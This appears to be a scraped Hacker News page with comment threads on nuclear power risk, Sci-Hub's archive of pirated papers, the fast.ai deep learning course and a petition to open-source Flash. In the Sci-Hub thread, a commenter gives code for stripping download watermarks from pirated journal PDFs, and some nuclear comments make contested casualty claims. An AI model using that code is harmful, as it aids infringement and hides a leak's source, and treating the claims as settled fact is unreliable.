(They've failed us as well in the case of fossil fuels, and, quite possibly, for hydro power -- I'm not giving this example as an endorsement of either, but to tell the story of risk and closure, or its lack. Those are other stories, for other posts.)

The problems with nuclear power are massive, long-tailed, systemic and potentially existential. The same cannot be said of a wind farm or solar array. There is no significant 10,000 year threat from wind power, or solar power. We're not risking 30 - 60 km exclusion zones, on an unplanned basis, of which we've created at least four in the half-century of significant nuclear energy applications: Hanford, Washington; Three Mile Island, Pennsylvania; Chernobyl, Ukraine; and Fukushima, Japan. And this is with a global fleet of some 450 operating nuclear power plants as of 2017.[2]

(This compares with over 7,600 power plants in the United States alone.[3])

None of these sites has been fully remediated. In the specific case of Hanford, the current management plan is budgeted at $2 billion, and there is no final management plan in place -- this, eighty years after the facility first opened.

If the total experience has been, say, 500 reactors over 50 years, or 25,000 reactor-years, and we've seen at least four major disasters, then our failure rate is 0.016% per reactor-year.

The global share of nuclear power generation in 2012 was about 10%.[4] Which means that without allowing for increased electrical consumption within existing or extending to developing nations, the plant count would have to increase tenfold.

Holding the reactor-year failure rate constant would mean 80 core meltdowns per century.

Reducing that to the present rate of four meltdowns/century would require reducing the failure rate to 0.0008%. That's five nines, if anyone's counting.
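The back-of-envelope arithmetic above checks out; here is a sketch of it, where the reactor counts and disaster tally are the comment's own assumptions, not authoritative figures:

```python
# Assumed figures from the comment: ~500 reactors over ~50 years, 4 major disasters.
reactors, years, failures = 500, 50, 4
reactor_years = reactors * years               # 25,000 reactor-years of experience
rate = failures / reactor_years                # historical failure rate per reactor-year
print(f"{rate:.3%}")                           # 0.016%

# A ten-fold build-out, run for one century
future_reactor_years = reactors * 10 * 100     # 500,000 reactor-years
print(rate * future_reactor_years)             # expected meltdowns per century: 80.0

# Rate needed to hold the line at 4 meltdowns per century
target = 4 / future_reactor_years
print(f"{target:.4%}")                         # 0.0008%, i.e. 99.9992% per-reactor-year reliability
```

The "five nines" claim follows from that last number: 1 - 0.000008 = 0.999992.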

Five nines on a process involving weather, politics, business, social upheaval, terrorism, sabotage, individual psychology, group psychology, climate, communications, response, preparedness....

And ... the involvement of the Japanese mafia, the Yakuza, in the management of TEPCO, which operated the Fukushima nuclear power plant.[5]

All of those factors played a tremendous role in how badly the Banqiao disaster itself played out -- and by the same dynamics, everything which happened at Banqiao could just as well have happened at a nuclear plant.

But it wasn't a nuke, it was a dam. And after a few hours, the waters receded, and after a few weeks, the land dried, and after a few months, recovery could start, and after a couple of decades ... even in what was still a poor country ... the recovery was complete.

Banqiao was a disaster, no doubt.

But what it wasn't was a nuclear disaster.



0. https://en.m.wikipedia.org/wiki/Zhumadian

1. http://www.sjsu.edu/faculty/watkins/aug1975.htm

2. https://www.nei.org/Knowledge-Center/Nuclear-Statistics/Worl...

3. https://www.eia.gov/tools/faqs/faq.php?id=65&t=3

4. http://www.iea.org/publications/freepublications/publication...

5. https://www.theatlantic.com/international/archive/2011/12/ya...

swills 21 hours ago 0 replies      
Clean, safe, too cheap to meter! /s
hristov 22 hours ago 1 reply      
You have to be very careful about these studies, because most official government studies flat out lie about the effects of nuclear disasters.

The most egregious example is Chernobyl, where the official Soviet position was that only a single person died from the disaster. But studies from other nations say the death toll may be close to one million. Well, believe it or not, a lot of these studies that show how safe nuclear is actually take the official Soviet data about Chernobyl as truth. (I am not sure whether this is the case for this particular study, because their source is behind a paywall.)

But similar (if not as outrageous) lies have also been told about accidents in the west. The official story about Three Mile Island, for example, is that it caused no deaths, yet studies find drastic increases in all kinds of cancers in the affected area. See, for example, https://www.counterpunch.org/2015/03/27/cancer-and-infant-mo...

I usually believe that we should be guided by science and data in our public decisions, but the data surrounding nuclear is so distorted by governments that it is just not to be trusted. And now that we have truly safe alternatives like solar and wind, we can finally put that nightmare behind us.

nnfy 19 hours ago 0 replies      
People are using Fukushima to rationalize their fear of nuclear, just like we did after Three Mile Island and Chernobyl. As someone else confirmed by posting [1], a magnitude 9.0 earthquake and a 15 meter tsunami had not occurred there in at least 100 years. We can tear the plant down in hindsight, but it was designed to withstand probable events, just like any safety standard. It may not be pleasant to speak of human life in this manner, but there is always a cost/risk balance in any human endeavor, and this failure does not necessarily indicate recklessness.


CodeWriter23 20 hours ago 0 replies      
Bullshit. Any energy source where we do not have the technology to clean up the worst case scenario is not the "safest".
dijit 20 hours ago 0 replies      
As a person who actually likes nuclear energy:

The issue I have with Nuclear is that we have not managed to fix the waste issue, and nobody seems to want to talk about it.

I'm not a huge fan of "salting the earth" for 10,000 years.

And when you say "it's safe", you're inherently ignoring that you basically have this toxic waste that is too costly to shoot into space and too dangerous to keep anywhere on earth for 10,000 years without it eventually harming the ecosystem.

dsfyu404ed 21 hours ago 0 replies      
I find it amusing that HN is so divided on this issue, yet quite unanimous in its distaste for how the Middle East treats people and how the Far East treats the environment.

Nuclear power will look a lot prettier when it's competing on price with socially and environmentally ethical solar cells and fossil fuels.

pinaceae 22 hours ago 0 replies      
Funny humans care about their children.

Nothing is scarier than birth-defects. Radiation causes very visible birth defects.

Hence people are very, very scared of radiation. And rightly so.

A windpark will not cause disfigured babies. Hence wind is better.

And: nuclear is the most expensive energy source, by FAR. Safety, waste, clean-up -- super, super expensive. Dismantle a wind park and it is gone, poof. Dismantle a reactor and now you have a new problem.

Also very hard to weaponize wind or solar. Blow up a wind park and well, the wind park is gone. Steal a rotor and now you have a rotor.

etc etc etc.

What is sooo hard to understand about this?

abritinthebay 23 hours ago 1 reply      
This has been known for a long time in informed circles.

The problems with nuclear are waste and that we use vastly outdated designs and fuel sources.

Nuclear is not perfect, but we should not buy into a perfection fallacy when looking to get away from fossil fuels.

Solar is a better long term bet but a good progressive nuclear strategy that added a handful of small modern reactors could be massively complementary to it.

melling 23 hours ago 1 reply      
Strange, there have been lots of discussions about nuclear on HN and a lot of people here don't like it.

e.g. https://news.ycombinator.com/item?id=13234463

cratermoon 22 hours ago 0 replies      
Two words: Hanford Site
ebbv 22 hours ago 1 reply      
padseeker 22 hours ago 9 replies      
tinco 22 hours ago 0 replies      
All the energy sources in this article except for nuclear are horrible for our environment and our health. The important question is what we replace them with. And if that is the important question, what good is this article if it shows only one solution, explicitly not comparing it with the other solutions?
Sci-Hub's cache of pirated papers is so big, subscription journals are doomed sciencemag.org
628 points by happy-go-lucky  4 days ago   236 comments top 30
TeMPOraL 4 days ago 18 replies      
I'm very happy to see SciHub going strong - for all the obvious reasons. Now let's just hope they back up to IPFS (if they do, I'll happily pin some of it).

I want to go off a tangent here, though. Now that open access (whether arXiv or SciHub style) is becoming the norm, I wonder what can be done to improve the format of scientific papers? Like e.g. making them more like this:


instead of regular PDFs?

welder 4 days ago 1 reply      
Good riddance, limiting access to scientific articles is a detriment to the advancement of humanity.
fsloth 4 days ago 2 replies      
Basically, the publishers asked for this. Denying open access to old papers is, from humanity's point of view, wasteful. The planet is full of hungry minds. Who knows where the next Ramanujan comes from or which discipline he or she chooses, but given the non-existent transaction cost of reading an old paper, it would be beyond silly if they could not do it for free.
philipkglass 4 days ago 3 replies      
I had quite a bit of exposure to pirate journal archives before sci-hub arrived. A couple of easy improvements that I saw with past pirate libraries, that it'd be nice to have on sci-hub:

- Strip download watermarks ("Downloaded by Wisconsin State University xxx.xxx.xxx.xxx on January 12, 2017 13:45:12"). Many times, journals published by the same publisher do the watermarking similarly, so you need to write just one pdftk (or other PDF manipulation software) script for every journal under their banner. At worst, it's a one-script-per-journal effort.

- PDF optimization. A lot of publishers produce un-optimized PDFs that could be 25% (or more) smaller with a completely lossless space optimization pass. This should save storage/network costs for access to individual papers and, more importantly, reduce the burden for bulk mirrors.

(I'd contribute the scripted passes myself if I had contacts within sci-hub.)
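The watermark pass described above could be sketched as a naive byte-level substitution. This is an illustrative toy, not any actual sci-hub tooling: it assumes uncompressed content streams and a known watermark prefix, whereas real journal PDFs usually compress their streams, so a real script would decompress first (e.g. with qpdf) and re-compress afterward.

```python
import re

def strip_watermark(pdf_bytes: bytes, marker: bytes) -> bytes:
    """Remove PDF text-showing operators whose literal string contains `marker`.

    Only works on uncompressed content streams; a real pass would first
    decompress the streams and then re-compress them.
    """
    # Match a PDF literal string `(...)` followed by the Tj operator,
    # when the string contains the watermark marker.
    pattern = re.compile(rb"\([^()]*" + re.escape(marker) + rb"[^()]*\)\s*Tj")
    return pattern.sub(b"", pdf_bytes)

# Toy fragment of a content stream with a watermark and real text:
stream = b"BT (Downloaded by Wisconsin State University 10.0.0.1) Tj (Actual article text) Tj ET"
cleaned = strip_watermark(stream, b"Downloaded by")
```

One such pattern per publisher corresponds to the one-script-per-publisher effort described above.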

headcanon 4 days ago 5 replies      
The change won't be immediate, though. I don't think universities, which are the journals' bread and butter, are going to stop their subscriptions anytime soon. Stopping a journal subscription because everyone is using sci-hub anyway (even if the researchers really are doing so on an individual basis) might open the door to copyright suits against the universities, which would undoubtedly be more expensive than just keeping the subs going, especially since it's just a line item in an accountant's book. I'm sure it will happen eventually, but journals might have enough time for some to pivot to a more nuanced business model before they go bust.
icelancer 4 days ago 0 replies      
Alexandra Elbakyan's work is one of the most positive and important things to happen in the last 3 decades in the field of science, which has been gradually losing its luster due to the bastardization and devaluation of the field by politicians and salespeople using it like hucksters.

Elbakyan's work has inspired me to publish only in journals that embrace open access and open data. I'll be damned if I am a slave to impact factor and other haughty metrics.

dekhn 4 days ago 3 replies      
The origin of the web was to disseminate scientific knowledge. The guardians of that knowledge- the journal publishers- have absolutely failed to make a viable business model out of this, while many companies who adopted the web made billions.

While I do not use Sci-Hub, I think that users who do are acting morally and ethically (in the sense of conscientious objection). I hope they are also willing to pay penalties if they are found to be violating copyright (this is generally considered a requirement for intentional protest).

sixdimensional 4 days ago 2 replies      
So, fundamental question here - if scientific articles (or anything that can be copy protected, etc.) can be released online in this manner to "free the knowledge", and yet, given such free access, there are still people that will pay for a subscription to access the same scientific articles, wouldn't that be the best solution?

I see people commenting that just because of this release, universities won't cancel their subscriptions to the journals. Well, that would be great - let them keep paying, while the content also gets out for free.

This is like the trend where you can pay what you want for stuff, or nothing. I wonder if that model would apply to scientific research - pay what you want for the paper, or nothing - but if you want to support that research.. hopefully people would still pay.

Just thinking out loud... probably already been thought of or wouldn't work (or I'm just self-defeatist). :)

drewda 4 days ago 0 replies      
I'm all for Sci-Hub disrupting the dominance of RELX Group (a.k.a. Elsevier) and other for-profit publishers that make such a big profit off the backs of researchers (who write and edit for free) and grant-making organizations (who fund those researchers).

But it's unfortunate that Sci-Hub is also disrupting non-profit scholarly associations that cover their own budgets through journal subscriptions. In these cases, the fact that libraries and readers have to pay for access to an article is somewhat balanced out by the fact that those fees are going to pay for staff, conferences, and the other worthwhile activities of the non-profit associations.

koolba 4 days ago 3 replies      
So is Sci-Hub like Oink[1] for scientific papers?

EDIT: For those not familiar, Oink was a torrenting site, but what distinguished it from the tons of other sites was how highly curated it was: high-quality audio, proper grouping and genres, and, best of all, you could request anything that was missing and the community would magically add it.

[1]: https://en.wikipedia.org/wiki/Oink%27s_Pink_Palace

CorvusCrypto 4 days ago 2 replies      
How does this doom subscription journals? I mean, it would be nice, but realistically it just means they move to exploit university subscriptions, since professors can't admit to using illegally obtained copies. They can further exploit the authors, since many journals require payment from the author for submission, and some journals charge in the hundreds. One might say "just publish in a different journal", but it's not that easy. Because of the heavy reliance on impact factor in scientific publishing, it is the journals with those high impact factors that authors will try to publish in, regardless of whether or not they are being pirated.

This is sad to say, but in reality I think this isn't going to massively impact things for the publishers. Academia at its core is where the problem lies. Sure, paid subscriptions are a big part of things, but it's the stuff most don't realize (the authorship fees and institutional sub fees) that gives the publishers power.

darawk 4 days ago 0 replies      
The death of for-profit scientific journal companies will be a beautiful thing for the world. It's really rare to see something so purely valueless. This industry is sort of unicorn-like -- they've managed to extract rents in an area where they add literally zero value. It's truly an amazing thing, and it will be even more amazing to watch it die.
sillysaurus3 4 days ago 4 replies      
I was surprised that it's still considered rude to link to sci-hub: https://news.ycombinator.com/item?id=14714577#14715252

Anyone know if this is a typical sentiment? I'm just curious if it's true that many researchers are offended by this movement, and what the reasons are.

I firmly believe that there are always two sides to any topic, so we should explore the flipside. What are some arguments against blatantly opening up access to paywalled articles?

biomcgary 4 days ago 0 replies      
I've met the author of the study, Daniel Himmelstein, who is quite passionate about making information free. Projects in his github account (https://github.com/dhimmel) tend to use a CC0 license. Some of his work involves aggregation of data (e.g., https://github.com/dhimmel/hetionet) that is encumbered and he has put a lot of effort into making it as free as possible. His project carefully documents the license for each data point and he took the time to ask copyright holders that do not provide an explicit license to do so.
return0 4 days ago 0 replies      
The Noah's Pirate Ark that will save all of humanity's knowledge from unreliable publishers.
philipkglass 4 days ago 1 reply      
I don't think that sci-hub is going to kill off institutional journal subscriptions in the developed world. It's similar to how developed-country universities didn't stop buying licensed software and start passing around cracked versions to their faculty and students. Journal revenue isn't going to plummet like CD sales after Napster, because it's not individuals doing most of the purchasing in the first place.

Individuals and institutions in poor countries may well turn to sci-hub. I certainly have. But I would venture that not much of the journals' revenue came from individuals or poor institutions in the first place. I didn't pay to read paywalled papers before sci-hub either; I got them via authors' sites or personal contacts, or just didn't get to read them at all.

return0 4 days ago 0 replies      
The academic world has missed some decades of advancement of communication. In a world where all published science is open for meta-processing, the burden of validating science would shift to search engines. There would be search engines competing with scientific-SEO of course, but in the medium-run this would improve scientific writing, and possibly speed up science in general. In the end there will always be some private actors doing the work of "ranking" scientists. Academics are hanging on to the current peer-review journals precisely because they don't want to give that power to other actors.
pdimitar 3 days ago 0 replies      
I'll be that guy who will gladly eat some downvotes for this apparently unpopular opinion:

"Science" and "subscription" (or any monetary incentive) don't compute in a single sentence. Aren't scientists funded by governments and/or corporations? Why should anyone pay them a royalty above that?

It's a legit question and not trolling, don't mistake my slightly angry tone for degrading please.

turc1656 4 days ago 0 replies      
Looks like Aaron Swartz's vision for the free, collective ownership of mankind's scientific knowledge is well on its way. I wish he were still alive to see Sci-Hub in action.
revelation 4 days ago 1 reply      
Does Sci-Hub actually have all the papers or are they just retrieving them on-demand?

Publishers track mass downloads (see the Aaron Swartz case), so given some of the very obscure papers I've retrieved from Sci-Hub, I assume it's unlikely they downloaded them beforehand. My go-to assumption for how it works is that a bunch of people have donated their university network access and Sci-Hub is just a load-balancing / cache layer.

filedrawer 4 days ago 0 replies      
I work for a scholarly publisher and I'd be very interested in hearing about what -- aside from cost -- would cause you to go to Sci-Hub for a paper?

Is it reading experience? Site performance? Difficulty in navigating publishers' sites?

Are there any good experiences you can point to? I'm really interested in making this better.

bogomipz 4 days ago 1 reply      
Can someone who's familiar with this research paper subscription model that is threatened a la Elsevier explain to me how we got here?

I am curious: did universities at one time publish these independently, and were they more accessible to the public? When did this practice of restricting access to papers via subscriptions begin?

kazinator 4 days ago 0 replies      
They should expand into engineering: I don't see any IEEE or ISO standards in there, for instance.
daveheq 4 days ago 0 replies      
Now if we could get the government version of this...
andrepd 4 days ago 0 replies      
Thanks! That reminds me I should donate to Sci-Hub!
sonium 4 days ago 1 reply      
This will be a catalyst for open-access
joelthelion 4 days ago 0 replies      
If only. I'm convinced they will find a way to shut her down.
vbuwivbiu 4 days ago 0 replies      
and it's better than all of their websites!
agumonkey 4 days ago 0 replies      
Has anybody mirrored (or attempted to mirror) libgen?
mcappleton 4 days ago 1 reply      
It's not just the publishing industry that is the problem. It is merely a symptom of the greater malaise in higher education as a whole.

The focus is on degrees, not on true learning. So much of what occurs in universities is total waste. But people put up with it to get the paper. As long as people keep blindly handing over absurd sums of money to get the paper, these expensive publications will last. The answer is for people to wake up and value learning over a diploma. When that happens, issues like this will finally go away. Heck, as a bunch of people have pointed out, many of these papers aren't even for real learning. They are worded so as to sound smart to their peers, but unintelligible to the public.

Deep Learning for Coders Launching Deep Learning Part 2 fast.ai
690 points by jph00  1 day ago   91 comments top 19
metafunctor 1 day ago 5 replies      
Part 1 was great.

However, the first lesson took a bit of stamina to get through. Much of it introduced basic Unix/AWS/shell/Python things I know intimately and have strong opinions and deeply set ways about. Shell aliases, how to use AWS, which Python distribution to run, running Python from some crazy web tool called notebooks (and not Emacs), etc. It felt like I was forced to learn a random selection of randomly flavored tools for no good reason.

Yes, it's a random selection of tools. The good reason to bear them is that you'll learn how to implement state of the art deep learning solutions for a lot of common problems.

So, I ended up viewing the lessons not as "this is how you should do it", but rather as "here's one way to do it". And it does get much easier after internalizing the tools in Lesson 1.

Just something to keep in mind when branding this as "deep learning for coders". Coders have deep opinions about the tools they use :)

phunge 1 day ago 1 reply      
Highly recommended! The first course was the first thing I came across that helped me contextualize the DL field into something that might be relevant for my work. It's a great way to get your hands dirty.

One point of comparison is Cam Davidson Pilon's Bayesian Methods for Hackers, they have a similar vibe: practical applied advice from a field that tilts towards the academic...

ashkat 1 day ago 0 replies      
Thank you so much for this. For me, Deep Learning Part 1 was a top-notch course that really helped me learn by actually doing things across a variety of topics (e.g. competing in Kaggle, creating spreadsheets to understand collaborative filtering & embeddings, sentiment analysis using CNNs and RNNs, etc). I found the top-down approach very effective in keeping me motivated as I worked my way through the course. It took me 6 months of watching (and rewatching) the videos and working on problems to get comfortable.

I have done a few MOOCs: Andrew Ng's machine learning, the Coursera ML specialisation, edX's Analytics Edge. All of them were good learning experiences, but fast.ai's Deep Learning Part 1 really stood out.

For me, the combination of the Deep Learning Book + fast.ai MOOC + CS231n (YouTube videos & assignments) covers almost everything I want to learn about the subject.

@jph00, I'm halfway through neural style transfer and I am loving it.

jph00 1 day ago 0 replies      
I somehow forgot to mention in the post - we're teaching a totally updated part 1 course (Keras 2, Python 3.6, TensorFlow 1.3, recent deep learning research results) starting end of October in San Francisco. Details here: https://www.usfca.edu/data-institute/certificates/deep-learn...

I'll go edit the post with this info now - but figured I'd add a comment here for those that have already read it.

colmvp 1 day ago 5 replies      
My feelings on Part 1:

I felt like the setup of the first part was at times a little frustrating, since I started it during a time when Keras had switched to a newer version which wasn't compatible with some of the utility code that was written. Add to this the newbie factor of notebooks, and it was a pretty rough first week or so to set up and get actual learning done. It took me a bit of time to realize notebooks were more like repeatable trains of thought than well-written production code.

The other thing is that some of the supplementary material was really long and at times made me feel like, why take this course instead of just going through a course mentioned in the supplementary material (e.g. CS231n wrt CNNs)? I think I ended up spending hundreds of hours reading/watching/practicing CNNs by reading papers, watching Karpathy's 231n videos, and doing a couple of tutorials from data scientists who elaborated on a specific problem they were solving. I guess at times when watching Part 1's videos and doing the notebooks, I didn't feel like I was 'getting it' as much or as fast as when I was getting the information through other means.

While the forum discussions can be helpful, it was also wading through a ton of unstructured content. And the service they used for the forums remapped the find shortcut to their own built-in search, which was a little annoying. I don't know a great solution to having more structured data, but perhaps adding some of the questions that were answered to the lesson's wiki. Or maybe splitting the technical issues from the high-level concepts.

Lastly, I think it was either HN or /r/MachineLearning where someone had suggested a book regarding machine learning and hands-on TensorFlow usage, which I picked up, and I felt like my pace of learning really sped up afterwards. I think part of it is that TensorFlow has a lot more written about it, so when you encounter an odd problem, chances are someone else has something to say about it.

All criticisms aside, I think I'll try going through Part 1 a second time around prior to going through Part 2.

DrNuke 1 day ago 0 replies      
The n00best path to data science and machine learning state of the art is now complete, no excuses! 2015: Andrew Ng's Coursera MOOC; 2016: Kaggle competitions with xgboost and ensembles; 2017: deep learning code-oriented courses with fast.ai and GPU hardware for the masses. Thanks, very lucky to witness and try this.
natch 1 day ago 3 replies      
Afraid I may have missed the window on the chance to provide feedback to jph00 via this channel, but here goes.

Am watching Part 1 now and only two sessions in, but there are some tweaks I would love to see. First the positive: I really appreciate the approach of hands-on and teaching theory only as it's needed and in conjunction with applied work.

Would love to see a tiny bit of time spent on setting up tools for people who already have good Nvidia GPU systems. My Ubuntu system has python (2.7) and python 3.5 both installed, but no Anaconda... I don't know if I'm going to totally screw up my system if I install Anaconda over those working existing python installations, for example.

It would be great to hear the questions. I can barely hear a faint voice in the background as Rachel reads the questions (presumably from online) but it seems like it would be a very easy tweak to have her closer to a microphone. Maybe this happens in later sessions and I just haven't gotten to them yet.

It would be great if so many things weren't abbreviated in the code variable and function names. Examples: nb for notebook, t for ?, a for array(?), U, s, and Vh for ?, ims (?), interp (interpretation or interpreter or interpolation?), sp, v, r, f, k, trn (train or turn or something else?), pred (predicate or prediction?), vec_numba (?)... the list goes on. Yes if I knew the field these might be obvious but for some of them I'm still learning. "np" I understand since that's standard practice and you explained it. It would be really really easy to just spell out words in the code, as well as being a good practice in general imho, and, since you are trying to teach stuff, it would seem appropriate.

Those nitpicks aside I'm really stoked about the course and really appreciate everything you have been putting into it!

daedalus13 1 day ago 1 reply      
jph00, I found the first course hard to follow because of some broken links and poorly organized content. One link that was necessary kept taking me to a password-protected page. This was about a month ago.

It would be good if someone could revisit Part 1 and make those minor editorial fixes if they haven't already done so.

I might be being too precious about my time, but I also found the first video about your teaching philosophy somewhat gratuitous; I wish I hadn't watched it.

alexcnwy 1 day ago 0 replies      
Honestly can't recommend this course highly enough.

It's definitely not perfect - the notebooks are not commented and the material does tend to jump around a bit - but what it does do, it does extremely well.

This course will teach you how to actually build deep learning systems and build the kinds of things you read about PhDs doing...

mcintyre1994 1 day ago 1 reply      
I've been looking to do part 1, so this is really cool - looking forward to this too! On http://course.fast.ai/part2.html the thumbnail for lesson 8 has specs for building a PC, with advice to use PCPartPicker. For part 1 I liked the idea of using AWS and only paying for a few hours; does part 2 have a hard requirement of an investment of hundreds of dollars in hardware?
BrianMingus 1 day ago 1 reply      
Latently (SUS17) also provides a more self-directed path to learning deep learning focused exclusively on implementing research papers and conducting original research: https://github.com/Latently/DeepLearningCertificate
edshiro 1 day ago 0 replies      
This is exciting! I went through Part 1 a few weeks ago (probably have to cover embeddings and RNNs again...) and felt it was totally worth it.

Part 2 seems equally strong in content (if not stronger). It's a beautiful time to be a n00b in deep learning & AI, and to learn via material like this. No excuses. Knowledge is power.

Omnipresent 1 day ago 1 reply      
For folks who've gone through parts 1 and 2: do you think the course provides enough material to tackle tasks like deep learning OCR [1] or custom object detection in images?

[1]: https://blogs.dropbox.com/tech/2017/04/creating-a-modern-ocr...

cs702 1 day ago 0 replies      
Based on the feedback I'm reading here about Part 1, I'm going to start recommending these courses to non-academic friends who have expressed interest in learning more about Deep Learning.

THANK YOU for doing this.

bitL 1 day ago 0 replies      
Wonderful! You picked a really nice selection! Can't wait to do them all! Thank you!
cakedoggie 1 day ago 1 reply      
They don't even have a link to part 1 at the start of the article??
mikden 1 day ago 0 replies      
Looking forward to part 2, Jeremy! Part 1 was nothing short of excellent.
Tsagadai 1 day ago 0 replies      
jph00, I would just like to thank you for the first course and now the second course. I've thoroughly enjoyed both and they have taught me a lot.
throwaway12017 1 day ago 1 reply      
What is the goal of these trainings? To get a taste so you understand the conversation? There is a lot more to data science than neural networks, and I worry that teaching one family of models will create a set of implementers who don't compare and contrast solutions.
Petition to open source Flash github.com
558 points by pkstn  5 days ago   240 comments top 49
notacoward 5 days ago 26 replies      
No no no no NO. It's time to get rid of Flash. Open-sourcing will make it live forever.

Flash has very little to offer that is not at this point duplicated (or improved upon) by others. It's also woefully insecure. "Many eyes make all bugs shallow" will only work for the most trivial bugs in the most common code paths. Plenty of vulnerabilities will remain. In open source, they'll be even easier for attackers to find and exploit. If you want something open-source and (mostly) Flash compatible, follow nkkollaw's suggestion: support one of the already-open-source alternatives.

aylmao 5 days ago 0 replies      
I learned to program in ActionScript 2 on Macromedia Flash MX back in high school. In spite of all the (deserved) hate Flash gets, we've got to give it credit too.

- It was a response to the stagnant IE-dominated web that allowed people to experiment and create incredibly rich content that is still hard to replicate.

- Its editor was amazing for introductory programming. It was as easy and intuitive to use as any vector-graphics editor, but you could get really complex in your programming too. It was very visual, very graphical, which helped.

- It was great for animation. I really can't think of anything that compares. There's lots of animation software out there but most are targeted to video. There's lots of libraries for animating Canvas/SVG, but they don't have interfaces/editors for non-programmers. Flash was an amazing middle-ground; a great creative AND technical tool IMO.

- ActionScript was nice; it wasn't daunting, it had types to help you, but they didn't clutter the syntax. If I recall correctly, the tooling wasn't too shabby either, with good auto-complete and suggestions as you type.

It's thus no wonder it caught on like wildfire and there was so much content for it. It was a good option for technical projects and creative ones, beginners and experts. I definitely don't want to see Flash making a comeback on the web, but I wouldn't mind seeing it in standalone applications (assuming security doesn't become an issue), and I could see its value in education, granted, with the right editors and tools.

jarym 5 days ago 5 replies      
So much hate for Flash. Yes it has regular security holes, is CPU hungry and a lot of people used it to create some mightily annoying things....

But Flash was a gift from the gods back in the early days of IE and most people forget that. If you wanted to make some HTML look nice you had little more than the dreaded 'blink' tag to work with.

If it weren't for Flash, I doubt the CSS, SVG, Canvas and HTML5 bells and whistles that designers can actually use now would be anywhere near as advanced.

I doubt Adobe will open source it though. They probably know there's a whole heap of other security issues in it that'll get found and exploited as soon as they release it. Your average user won't be able to patch fast enough!

nkkollaw 5 days ago 6 replies      
Why not contribute to well-established open source Flash players?
ransom1538 5 days ago 2 replies      
Again. From my game dev days, the people that really lose (over and over) are the artists. Millions of hours have been sunk into laying out vector graphics with the Flash IDE. Code, I understand, should eventually be tossed away, but not art. I guess staring at millions of beautiful vector timelined illustrations changed my opinion - but it is art to me. And like books, I think it's a sin to toss. I hope the artists convert their .fla files over and save what they can.
simion314 5 days ago 3 replies      
I can't understand why people are against open-sourcing some proprietary code; why would it affect you? If you hate Flash that much, you will have the opportunity to see the source code and confirm that it is bad. All the open source reimplementations are incomplete, so with the opening up of Flash, the open source ones could have a look (if the license allows) and finish the reimplementation.
nradov 5 days ago 3 replies      
Chances are that Flash contains licensed third-party IP and thus Adobe couldn't unilaterally open source it even if they wanted to.
mstade 5 days ago 2 replies      
FWIW I posted[1] in the Flash EOL thread the other day that an Adobe employee told me years ago that licensing issues were the main hindrance to open sourcing the Flash player. (Another HN user who said they used to work for Adobe seems to back this up.) A lot of technology in the player was licensed and difficult to remove/refactor such that the player code could realistically be opened up, and there was little business incentive to invest resources into it. I'd imagine the incentives are even less now.

[1]: https://news.ycombinator.com/item?id=14850791

fenomas 5 days ago 0 replies      
I worked at Adobe near the Flash team back in the day, and the PMs I knew would have absolutely loved to open-source the Player. The problem isn't willingness, it's third-party code, of which there is apparently a lot.

If there was just a button to be pressed, Adobe would have pressed it circa 2010. But at this point, I think open-sourcing Flash Player is the kind of thing where the project to figure out what all would need to be done would cost more than Adobe would want to invest, never mind actually doing the necessary work (both engineering and legal).

gamedna 5 days ago 2 replies      
Flash has generated a tremendous amount of assets that will be lost. Preserving them for historical reasons is extremely important, but I am far less interested in preserving the technology than preserving the idea or creation itself. I would love to see an effort around converting or transcoding Flash assets to other technologies. For example, Flash movies being rendered to an open standard, or Flash games being automatically converted to JavaScript/HTML5. The content creators deserve to have their legacy recorded and maintained, but this is not the solution. (Granted, it may be a solution for other use cases, but I am not sure what those are.)
Anatidae 5 days ago 1 reply      
There could be an issue of opening up even more security issues for people with Flash still installed. That, in turn, will likely lead to an all out campaign to remove Flash from everything possible (maybe not a bad thing at this point).

But, honestly - Flash as a platform hasn't advanced much in quite a while. What it once offered - rich multimedia runtime engine across platforms - is either available in the browser directly or can be attained through even more rich engines such as Unity3D.

rnhmjoj 5 days ago 0 replies      
As long as it stays away from a browser it's perfectly fine.

I am already using gnash to run flash games and a feature complete open source implementation would be very welcome.

JohnTHaller 5 days ago 1 reply      
No, you don't need your silly Flash player to play free games in your web browser or to offer them to users at a payment plan and method of your choosing. We've got this great app store for you to use that only costs $100 a year to submit apps to, and we keep 30% of all the money you make on your game.
pan69 5 days ago 1 reply      

 Notice: The idea is not to save Flash Player, but to open source Flash!
What exactly is being referred to here? The Flash authoring tool I assume? As in, the application that you install on your desktop and use to create Flash animations with?

I think a better description of the purpose of this petition might be a good idea. A lot of people conflate Flash and Flash Player.

Popster 1 day ago 0 replies      
I'm all for a Flash emulator that emulates the functions that Flash currently has, but do not start an open source project that adds more functions and security issues and whatnot. Any further development must be stopped.
Animats 5 days ago 0 replies      
Just for historical reasons, it's good to have the source out there. Fifty or a hundred years from now, someone may want very badly to recover some old .swf file.
midnitewarrior 5 days ago 0 replies      
I don't think anybody wants to see what's actually under the covers. Also, I'm pretty sure they've licensed patents from other participants, so it's not very likely they would bother trying to figure out all those details.

Future history does need a copy they can use in the future to look at web sites of the past though. Content that relies on proprietary technology will be lost in the annals of history.

scj 5 days ago 0 replies      
Open sourcing code allows a new vector for finding vulnerabilities. Just because the software reaches its EOL doesn't mean it is removed from every computer.

I believe that open sourcing Flash should be done for the sake of software preservation. But I would recommend 2025 (end of life for Windows 10 and IE11) as the earliest release date.

BatFastard 5 days ago 0 replies      
You have to understand the source of the problem. The browsers do NOT want to support this level of plug-in, since it is less secure. That is why the Unity plug-in went away, and that is why ALL plug-ins are going away. Flash is still alive as AIR on mobile and desktop. But it is DEAD in browsers.
mirekrusin 5 days ago 1 reply      
"So Adobe, you're killing Flash now. That's fine since you apparently can't fix it."

Seriously, why start with sentences like that if you really care about it being open-sourced?

madshiva 5 days ago 0 replies      
If you want to save Flash, just install a virtual machine with WinXP and stay in the past. Too many websites still use Flash... come on, they have been warned so many times; Flash must die.
joe_momma 5 days ago 0 replies      
There should just be a Flash only browser with an HTML5 blocker muhahaha.
unsignedint 5 days ago 0 replies      
Aren't most recent applications of Flash about delivering DRMed video, while the rest move to something else like HTML5? If this is the case, open-sourcing Flash won't really help...
Brajeshwar 5 days ago 0 replies      
A bunch of us suggested this to Macromedia around 2005. Unfortunately, it never became a popular topic. Adobe took it over and, well, turtles all the way down.
pkstn 5 days ago 0 replies      
The idea is not to preserve the Flash player as is, but to open source the Flash spec to make it possible to archive all the good stuff out there!
flashplayer_exe 5 days ago 0 replies      
Browser vendors are already disabling Flash by default. There is no need to "kill" anything. Even if it were open-sourced today, it would still meet the same fate. The only people who care about open sourcing are those who want a standalone Flash player for archival purposes.

Gnash works pretty well with non AS3 noninteractive movies and looping swfs. Most games are still broken though.

